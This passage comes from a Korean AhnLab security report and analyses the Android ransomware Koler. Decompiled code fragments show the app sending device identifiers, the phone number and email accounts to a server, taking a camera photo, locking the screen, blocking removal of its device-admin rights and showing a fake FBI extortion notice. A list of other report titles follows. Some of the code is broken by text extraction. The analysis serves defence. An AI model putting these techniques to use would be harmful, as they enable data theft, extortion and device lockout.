Log.i("DevicePolicyDemoActivity", "Administration enabled!"); this.colotit(); break; default: super.onactivityresult(p3, p4, p5); return; 그림 3-9 onactivityresult 호출 관리자권한이활성화되어있으면 colotit를호출하고그렇지않으면 ebat를다시호출한다. ASEC REPORT 61 Security Trend 26
27 protected void colotit() { v6 = new PhotoMaker(this); v7 = new String[1]; v7[0] = "davai"; v6.execute(v7); this.alarm = new AlarmManagerBroadcastReceiver(); this.alarm.setalarm(this); v2 = this.getsharedpreferences("cocon", 0); if(v2.getint("status", 0)!= 77) { this.camera = v2.getint("camera", 0); if(this.camera == 1) { this.pict = v2.getstring("face", "facenull"); if(this.pict.contains("facenull") == 0) { this.face = 2; else { this.face = 1; if(this.camera == 2) { this.face = 1; v0 = this.getsharedpreferences("cocon", 0).edit(); v0.putint("start", 1); v0.putlong("starttime", Long.valueOf((System. currenttimemillis() / )).longValue(), ); v0.commit(); this.setcontentview( ); v1 = this.findviewbyid( ); v1.setwebviewclient(new SampleOverlayShowActivity$T estwebviewclient(this, 0)); v1.getsettings().setjavascriptenabled(1); v1.getsettings().setsupportzoom(0); v1.getsettings().setsaveformdata(0); v1.getsettings().setsupportmultiplewindows(0); v1.getsettings().setbuiltinzoomcontrols(0); v1.getsettings().setusewideviewport(1); v1.getsettings().setrenderpriority(websettings$render Priority.HIGH); v1.getsettings().setcachemode(2); v1.addjavascriptinterface(new SampleOverlayShowActiv ity$webappinterface(this, this), "Bot"); v1.loadurl("file:///android_asset/video.html"); else { Process.killProcess(Process.myPid()); return; 그림 3-10 관리자권한확보이후호출하는내용 그다음으로 PhotoMaker 클래스를시작한다. AlarmManagerBroadcastReceiver.Set- Alarm을호출해서 2분주기로 AlarmManagerBroadcastReceiver 알람을등록한다. Web- View에 file:///android_asset/video.html을불러와화면에나타내고자바스크립트인터페이스클래스인 SampleOverlayShowActivity$WebA ppinterface를등록한다. video.html에서사용자가링크를클릭하면 SampleOverlayShowActiv ity$testwebviewclient가동영상을실행한다. video.html에서보여주는동영상은성인음란물콘텐츠로, 사용자의관심을유도한다 RequestTask RequestTask는서버통신관련클래스이다. RequesTask OverlayService 연결 단말기정보, 이메일계정정보등서버전송 OverlayView 생성 그림 3-11 서버통신관련클래스인 RequestTask 동작방식 protected varargs String doinbackground(string[] p43) { v19 = new DefaultHttpClient(); v29 = new BasicResponseHandler(); v28 = new HttpPost; ASEC REPORT 61 Security Trend 27
28 v28(p43[0]); v25 = new ArrayList; v25(2); v36 = "n/a"; v9 = this.mcontext.getsystemservice("connectivity"); if(v9.getactivenetworkinfo().gettype()!= 0) { v21 = 0; else { v21 = 1; v22 = v9.getnetworkinfo(1).isavailable(); if(v21!= 0) { v36 = "mobile"; if(v22!= 0) { v36 = "wifi"; 그림 3-12 네트워크정보확인 RequestTask는연결된네트워크정보가모바일네트워크망인지와이파이 (WiFi) 망인지확인한다. v17 = ""; v4 = AccountManager.get(this.mContext).getAccounts(); v38 = v4.length; v37 = 0; while (v37 < v38) { v3 = v4[v37]; if(patterns. _address.matcher(v3.name). matches()!= 0) { v17 = new StringBuilder(String.valueOf(v17)).append(", ").append(v3.name).tostring(); v37 = (v37 + 1); v33 = this.mcontext.getsharedpreferences("cocon", 0); v34 = v33.getint("status", 0); v8 = v33.getint("camera", 0); v10 = v33.getstring("pcode", "null"); v11 = new StringBuilder(String.valueOf("")) getcontentresolver(), "android_id")).append(":-:").tostring(); v38 = new StringBuilder; v38(string.valueof(v11)); v11 = v38.append(this.mcontext.getsystemservice("phone" ).getdeviceid()).append(":-:").tostring(); v38 = new StringBuilder; v38(string.valueof(v11)); v38 = new StringBuilder; 그림 3-13 계정정보확인및이메일형태의계정수집 단말기에등록되어있는계정정보를읽어해당계정이이메일형태인경우, 이에대한정보를수집한다. 또한 SharedPreferences에기록했던각종설정정보를읽는다. v38(string.valueof(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf (v38.append(this.mcontext.getsystemservice("phone"). getline1number()).append(":-:").tostring())).append(this.getdevicename()).append(":-:").tostring())). append(build$version.release).append(":-:").tostring())); v7 = Base64.encodeToString(MCrypt.bytesToHex(new MCrypt().encrypt(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String. valueof(new StringBuilder(String.valueOf( new StringBuilder(String.valueOf(new StringBuilder(String. valueof( new StringBuilder(String.valueOf(v38.append(this.mContext. getsystemservice("phone").getnetworkoperatorname()).append(":-:").tostring())). append(v36).append(":-:").tostring())).append(v17). append(":-:").tostring())).append(this.mcontext.getresources(). getconfiguration().locale.getcountry()).append(":-:"). tostring())).append(string.valueof(v34)).append(":-:"). tostring())).append(string.valueof(v8)).append(":-:").tostring())). append(v10).append(":-:").tostring())).append(p43[2]). tostring())).getbytes("utf-8"), 0); 그림 3-14 단말기정보암호화.append(Settings$Secure.getString(this.mContext. ASEC REPORT 61 Security Trend 28
29 MCrypt.encrypt를호출한키값을이용해앞서읽어온정보들과함께전화번호, 단말기모델명, 제조사, 버전, 네트워크정보, 국가정보, 이메일계정정보, 사진촬영여부등의정보를암호화한다. v38 = new BasicNameValuePair; v40 = new StringBuilder; v40("#"); v38("imei", v40.append(this.mcontext.getsystemservice("phone"). getdeviceid()).tostring()); v25.add(v38); v25.add(new BasicNameValuePair("cmd", p43[1])); v25.add(new BasicNameValuePair("sub", String. valueof(v23))); v37 = new BasicNameValuePair; v37("data", v7); v25.add(v37); v37 = new UrlEncodedFormEntity; v37(v25); v28.setentity(v37); v30 = v19.execute(v28, v29); 그림 3-15 암호화한데이터전송 암호화한데이터를서버로전송하고서버로부터응답을받는다. if(v30.contains("unlock")!= 0) { v16 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v16.putint("status", 77); v16.commit(); v20 = new Intent; v20(this.mcontext, OverlayService); v20.putextra("close", "allclose"); this.mcontext.startservice(v20); if(v30.contains("incorrect")!= 0) { v16 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v16.putint("status", 3); v16.commit(); this.mcontext.startservice(new Intent(this.mContext, OverlayService)); if(v30.contains("usecode")!= 0) { v16 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v16.putint("status", 4); v16.commit(); this.mcontext.startservice(new Intent(this.mContext, OverlayService)); if(v30.length() > 3) { if(v30.contains("alllock")!= 0) { v16 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v16.putint("status", 0); v16.putint("animation", 0); v16.putstring("pcode", ""); v16.commit(); this.mcontext.startservice(new Intent(this.mContext, OverlayService)); if(this.mcontext.getsharedpreferences("cocon", 0).getInt("status", 0) == 77) { Process.killProcess(Process.myPid()); if(v30.contains("alllock")!= 0) { Log.i("muuuu", "ooopppsss"); v16 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v16.putint("status", 0); v16.putint("animation", 0); v16.putstring("pcode", ""); v16.commit(); this.mcontext.startservice(new Intent(this.mContext, OverlayService)); 그림 3-16 OverlayService 호출 ASEC REPORT 61 Security Trend 29
30 서버에서받은데이터에포함된값을이용해 OverlayService를호출한다. 이때 alllock, unlock, incorrect, usecode 등에따라서 status 값을다르게하여 OverlayService를호출한다 PhotoMaker PhotoMaker는스마트폰의전면카메라를이용한사용자얼굴촬영과관련된클래스이다. PhotoMaker PhotoHandler 그림 3-17 PhotoMaker 동작방식 전면부카메라사진촬영 촬영사진저장 protected varargs String doinbackground(string[] p7) { v5 = 0; this.openfrontfacingcamera(); this.cameras = this; if(this.cameras == 0) { v0 = this.mcontext.getsharedpreferences("cocon", 0).edit(); v0.putint("camera", 2); v0.commit(); else { this.cameras.takepicture(v5, v5, new PhotoHandler(this. mcontext)); return 0; 그림 3-18 openfrontfacingcamera 호출및스마트폰카메라실행 openfrontfacingcamera를호출하여스마트폰전면부의카메라의사진촬영에필요한설정을하 고카메라를실행한다. cameras.takepicture를실행하면사진이촬영되고이어 PhotoHandler가동작한다 PhotoHandler public void onpicturetaken(byte[] p13, Camera p14) { this.getdir(); if((this.exists()!= 0) (this.mkdirs()!= 0)) { v3 = new StringBuilder(String.valueOf(this.getPath())).append(File. separator).append(new StringBuilder("Picture_").append(new SimpleDateFormat("yyyymmddhhmmss").format(new Date())). append(".jpg").tostring()).tostring(); v4 = new FileOutputStream(new File(v3)); v4.write(p13); v4.close(); v2 = this.context.getsharedpreferences("cocon", 0).edit(); v2.putint("camera", 1); v2.putstring("face", v3); v2.commit(); else { v2 = this.context.getsharedpreferences("cocon", 0).edit(); v2.putint("camera", 2); v2.commit(); return; 그림 3-19 촬영한사진및기록, 파일경로저장 촬영한사진을 Picture_yyyymmddhhmmss. jpg 라는이름으로저장하고, 촬영기록과파일경로를저장한다. 4.6 catcher catcher는기기관리자권한을해제하지못하게하 ASEC REPORT 61 Security Trend 30
31 는클래스이다. public CharSequence ondisablerequested(context p5, Intent p6) { this.abortbroadcast(); v0 = new Intent("android.settings.SETTINGS"); v0.setflags( ); v0.setflags( ); p5.startactivity(v0); v1 = new Intent("android.intent.action.MAIN"); v1.addcategory("android.intent.category.home"); v1.setflags( ); p5.startactivity(v1); return "This action will reset all your data. Click "Yes" and your's device will reboot and "No" for cancel."; 그림 3-20 catcher 호출 catcher는사용자가기기관리자권한을비활성화하면호출된다. 사용자가기기관리자권한을비활성화하면 catcher는 Sample-OverlayShowActivity를실행시키고, This action will reset all your data. Click Yes and your's device will reboot and No for cancel. 이라는문자열을출력한다. 기기관리자권한의비활성화를계속진행할경우모든데이터가초기화된다고경고하는내용으로, 사용자가관리자권한해제를하지않도록유도한다. bootme AlarmManagerBroadcastReceiver OverlayService 그림 3-21 bootme 클래스동작방식 알람설정 Overlay View 생성 public void onreceive(context p5, Intent p6) { this.alarm = new AlarmManagerBroadcastReceiver(); this.alarm.setalarm(p5); if(p5.getsharedpreferences("cocon", 0).getInt("status", 0)!= 77) { p5.startservice(new Intent(p5, OverlayService)); else { Process.killProcess(Process.myPid()); return; 그림 3-22 AlarmManagerBroadcastReceiver 호출및알람설정 단말기가부팅되면 AlarmManagerBroadcast- Receiver를호출해 2분주기로동작하는알람을설정하고 OverlayService를시작한다 AlarmManagerBroadcastReceiver AlarmManagerBroadcastReceiver는앞서등록된브로드캐스트리시버코드이다 bootme bootme는부팅시동작하는리시버클래스코드이다. AlarmManagerBroadcastReceiver OverlayService 2 분주기로알람등록 RequestTask 그림 3-23 AlarmManagerBroadcastReceiver 동작방식 ASEC REPORT 61 Security Trend 31
32 public void onreceive(context p14, Intent p15) { v8 = p14.getsystemservice("power").newwakelock(1, "YOUR TAG"); v8.acquire(); v3 = p14.getsharedpreferences("cocon", 0); v4 = v3.getint("start", 0); v5 = Long.valueOf(v3.getLong("starttime", 0.0, v11)); v6 = Long.valueOf((System.currentTimeMillis() / )); if((v4 == 1) && ((v5.longvalue() ) < 0)) { p14.startservice(new Intent(p14, OverlayService)); v1 = p14.getsharedpreferences("cocon", 0).edit(); v1.putint("start", 2); v1.commit(); v9 = new RequestTask(p14); v10 = new String[3]; v10[0] = " v10[1] = "timer"; v10[2] = ""; v9.execute(v10); v8.release(); return; 그림 3-24 OverlayService 설정 2분주기로알람서비스를등록한다. 알람이벤트가발생하면앱이동작한지 30초이내일경우 OverlayService를시작한다. RequestTask를호출해서버로데이터를전송하고통신한다 OverlayService OverlayService는해당악성앱의화면이항상스마트폰의최상위에위치하도록제어하는클래스코드이다. OverlayService OverlayView 그림 3-25 OverlayService 동작방식 public void oncreate() { super.oncreate(); this.instance = this; this.overlayview = new OverlayView(this); return; public int onstartcommand(intent p6, int p7, int p8) { v0 = 0; if(p6!= 0) { v0 = p6.getextras(); if((v0!= 0) && (v0.getstring("close")!= 0)) { this.cancelnotification = 1; this.movetobackground(this.id, 1); this.getsystemservice("notification").cancel(this.id); Process.killProcess(Process.myPid()); if(this.overlayview!= 0) { this.overlayview.refreshlayout(); return 1; 그림 3-26 OverlayView 객체생성 View 가항상최상위에존재하도록설정 버튼클릭제한 file:///android_asset/index.html 출력 서비스가시작되면 OverlayView객체를생성하고, close 명령어가전달되면종료한다. overlayview.refreshlayout() 을호출한다. ASEC REPORT 61 Security Trend 32
33 protected Notification foregroundnotification(int p6) { v0 = new Notification( , "FBI", System. currenttimemillis()); v0.flags = ((v0.flags 2) 8); v0.setlatesteventinfo(this, "FBI", "Child s porn and Zoophilia detected", 0); return v0; 그림 3-27 허위경고창게시 이어아동음란물이감지되었다는 FBI를사칭한경고창을출력한다 OverlayView public void refreshlayout() { if(this.isvisible()!= 0) { this.removeallviews(); this.inflateview(); this.onsetuplayoutparams(); this.getcontext().getsystemservice("window"). updateviewlayout(this, this.layoutparams); this.refresh(); return; 그림 3-28 inflateview 호출 v1 = this.findviewbyid( ); v1.getsettings().setjavascriptenabled(1); v1.getsettings().setsupportzoom(0); v1.getsettings().setsaveformdata(0); v1.getsettings().setsupportmultiplewindows(0); v1.getsettings().setbuiltinzoomcontrols(0); v1.getsettings().setusewideviewport(1); v1.getsettings().setrenderpriority(websettings$renderpri ority.high); v1.getsettings().setcachemode(2); v1.addjavascriptinterface(new OverlayView$WebAppInterf ace(this, this.getcontext()), "Bot"); v1.loadurl("file:///android_asset/index.html"); return; 그림 3-29 음란물웹화면호출 inflateview는스마트폰화면위에 file:///androi d_asset/index.html을나타내고자바스크립트인터페이스인 OverlayView$WebAppInterface를등록한다. protected void addview() { this.setuplayoutparams(); this.getcontext().getsystemservice("window"). addview(this, this.layoutparams); super.setvisibility(8); return; 그림 3-30 스마트폰화면제어 서비스시작시생성된객체인 OverlayView가 inflateview를호출한다. private void inflateview() { this.getcontext().getsystemservice("layout_inflater"). inflate(this.layoutresid, this); this.oninflateview(); 스마트폰화면에악성앱의화면이항상맨위에나타나도록하고사용자의버튼조작을허용하지않는다. 이로써사용자는스마트폰단말기의동작을제어할수없게된다. Android-Trojan/Koler는성인동영상앱으로위 ASEC REPORT 61 Security Trend 33
34 장해감염을유도하고 FBI를사칭해사용자를협박하고벌금을빙자해금품을갈취하는방식의악성앱이다. 또한사용자의스마트폰이용을방해하는잠금기능도갖고있다. 이와같은스마트폰잠금악성앱은일단설치되면제거가매우까다롭다. 일반적인악성앱은기기관리자권한을해제함으로써제거가가능한반면, 이러한경우에는기기관리자권한을해제하려는동작이발생할때마다악성앱이등록한리시버가실행되면서관리자권한해제를방해하기때문이다. 따라서기기관리자권한을요구하는앱은꼼꼼히살펴보는습관이필요하다. 또한평소모바일전용백신프로그램인 V3 Mobile을최신엔진으로업데이트하고실시간감시기능을설정하는것이바람직하다. ASEC REPORT 61 Security Trend 34
35 ASEC REPORT vol.61 January, 2015 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.
Security Trend ASEC REPORT VOL.68 August, 2015
Security Trend ASEC REPORT VOL.68 August, 2015 ASEC REPORT VOL.68 August, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
Security Trend ASEC REPORT VOL.82 October, 2016 ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작
Security Trend ASEC REPORT VOL.80 August, 2016 ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC Report VOL.63 March, 2015
Security Trend ASEC Report VOL.63 March, 2015 ASEC Report VOL.63 March, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC REPORT VOL.67 July, 2015
Security Trend ASEC REPORT VOL.67 July, 2015 ASEC REPORT VOL.67 July, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며
Security Trend ASEC Report VOL.53 May, 2014 ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.58 October, 2014
Security Trend ASEC Report VOL.58 October, 2014 ASEC Report VOL.58 October, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More informationASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성
Security Trend ASEC REPORT VOL.85 January, 2017 ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며,
More informationSecurity Trend ASEC REPORT VOL.70 October, 2015
Security Trend ASEC REPORT VOL.70 October, 2015 ASEC REPORT VOL.70 October, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.78 June, 2016 ASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.69 September, 2015 ASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.75 March, 2016 ASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More informationSecurity Trend ASEC Report VOL.52 April, 2014
Security Trend ASEC Report VOL.52 April, 2014 ASEC Report VOL.52 April, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.83 November, 2016 ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.71 November, 2015 ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC Report VOL.62 February, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC Report VOL.62 February, 2015 ASEC Report VOL.62 February, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSystem Recovery 사용자 매뉴얼
Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.
More informationSecurity Trend ASEC Report VOL.57 September, 2014
Security Trend ASEC Report VOL.57 September, 2014 ASEC Report VOL.57 September, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationAndroid Master Key Vulnerability
Android Master Key Vulnerability Android Bug 8219321 2013/08/06 http://johnzon3.tistory.com Johnzone 内容 1. 개요... 2 1.1. 취약점요약... 2 1.2. 취약점정보... 2 2. 분석... 2 2.1. 기본개념... 2 2.2. 공격방법... 4 3. 방어대책... 7
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More information월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호
안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항
More informationMicrosoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationOffice 365 사용자 가이드
[ 여기에입력 ] Office 365 사용자가이드 OFFICE 365 모바일설정 목차 1. 모바일에메일계정추가하기... 2 2. Lync 2013 App 설치하기... 7 3. Office Mobile App 설치하기... 10 4. Office for ipad 설치하기... 16-1 - 모바일기기에 Office 365 를설정해보세요. 모바일기기에 Office
More informationSecurity Trend ASEC Report VOL.54 June, 2014
